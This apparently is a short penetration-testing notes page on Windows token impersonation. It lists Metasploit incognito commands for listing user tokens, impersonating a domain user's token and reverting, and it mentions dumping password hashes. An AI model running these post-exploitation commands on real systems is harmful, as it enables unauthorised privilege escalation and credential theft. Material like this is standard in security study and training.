Token Impersonation
What are tokens?
Types of Tokens
Execution
Metasploit
list_tokens -u // List's all the user tokens on a machine
load incognito // load the tool built-in metasploit
impersonate_token <domian>\\<user> // impersonate the user token
rev2self // if you have any problems executing programs like hashdumpLast updated